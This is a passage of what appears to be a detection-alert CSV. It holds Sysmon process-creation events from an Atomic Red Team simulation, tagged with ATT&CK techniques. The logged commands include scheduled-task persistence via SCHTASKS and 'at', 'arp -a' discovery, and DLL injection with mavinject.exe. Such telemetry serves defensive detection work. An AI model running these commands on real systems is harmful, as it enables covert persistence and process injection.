<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548022.815966,2019-07-19T18:53:42.815966+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:42.404357Z"">
</TimeCreated>
<EventRecordID>4031</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:42.384</Data>
<Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-0010D8D53700</Data>
<Data Name=""ProcessId"">6312</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548022.301844,2019-07-19T18:53:42.301844+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;arp -a&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:42.276408Z"">
</TimeCreated>
<EventRecordID>4029</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:42.259</Data>
<Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-0010DBCC3700</Data>
<Data Name=""ProcessId"">6292</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;arp -a&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548022.276408,2019-07-19T18:53:42.276408+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:42.061925Z"">
</TimeCreated>
<EventRecordID>4028</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:42.051</Data>
<Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-00104AC63700</Data>
<Data Name=""ProcessId"">6412</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548266.828722,2019-07-19T18:57:46.828722+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:46.640159Z"">
</TimeCreated>
<EventRecordID>4088</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:46.531</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-001025AD3E00</Data>
<Data Name=""ProcessId"">4552</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1563548266.608481,2019-07-19T18:57:46.608481+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:46.459733Z"">
</TimeCreated>
<EventRecordID>4086</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Persistence - Scheduled Task Management</Data>
<Data Name=""UtcTime"">2019-07-19 14:57:46.443</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-0010C4A83E00</Data>
<Data Name=""ProcessId"">1408</Data>
<Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Task Scheduler Configuration Tool</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA6A-5D31-0000-001072A63E00</Data>
<Data Name=""ParentProcessId"">4276</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548266.459733,2019-07-19T18:57:46.459733+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:46.422427Z"">
</TimeCreated>
<EventRecordID>4085</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:46.411</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-001072A63E00</Data>
<Data Name=""ProcessId"">4276</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548266.422427,2019-07-19T18:57:46.422427+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:46.207200Z"">
</TimeCreated>
<EventRecordID>4084</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:46.174</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-0010C09D3E00</Data>
<Data Name=""ProcessId"">3224</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548266.094355,2019-07-19T18:57:46.094355+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;at 13:20 /interactive cmd&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:46.073651Z"">
</TimeCreated>
<EventRecordID>4082</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:46.051</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-0010B2953E00</Data>
<Data Name=""ProcessId"">5036</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;at 13:20 /interactive cmd&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548264.283188,2019-07-19T18:57:44.283188+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:16.552097Z"">
</TimeCreated>
<EventRecordID>4080</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:16.531</Data>
<Data Name=""ProcessGuid"">747F3D96-DA4C-5D31-0000-001077603D00</Data>
<Data Name=""ProcessId"">6172</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548236.552097,2019-07-19T18:57:16.552097+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c .\bin\T1055.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:16.496455Z"">
</TimeCreated>
<EventRecordID>4079</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:16.477</Data>
<Data Name=""ProcessGuid"">747F3D96-DA4C-5D31-0000-0010655D3D00</Data>
<Data Name=""ProcessId"">2596</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c .\bin\T1055.exe</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1179] Hooking detected,1563548236.496455,2019-07-19T18:57:16.496455+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\mavinject.exe ) through command line ( &quot;C:\Windows\system32\mavinject.exe&quot; 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:15.776993Z"">
</TimeCreated>
<EventRecordID>4078</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:15.754</Data>
<Data Name=""ProcessGuid"">747F3D96-DA4B-5D31-0000-0010CB413D00</Data>
<Data Name=""ProcessId"">2604</Data>
<Data Name=""Image"">C:\Windows\System32\mavinject.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft Application Virtualization Injector</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\mavinject.exe&quot; 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
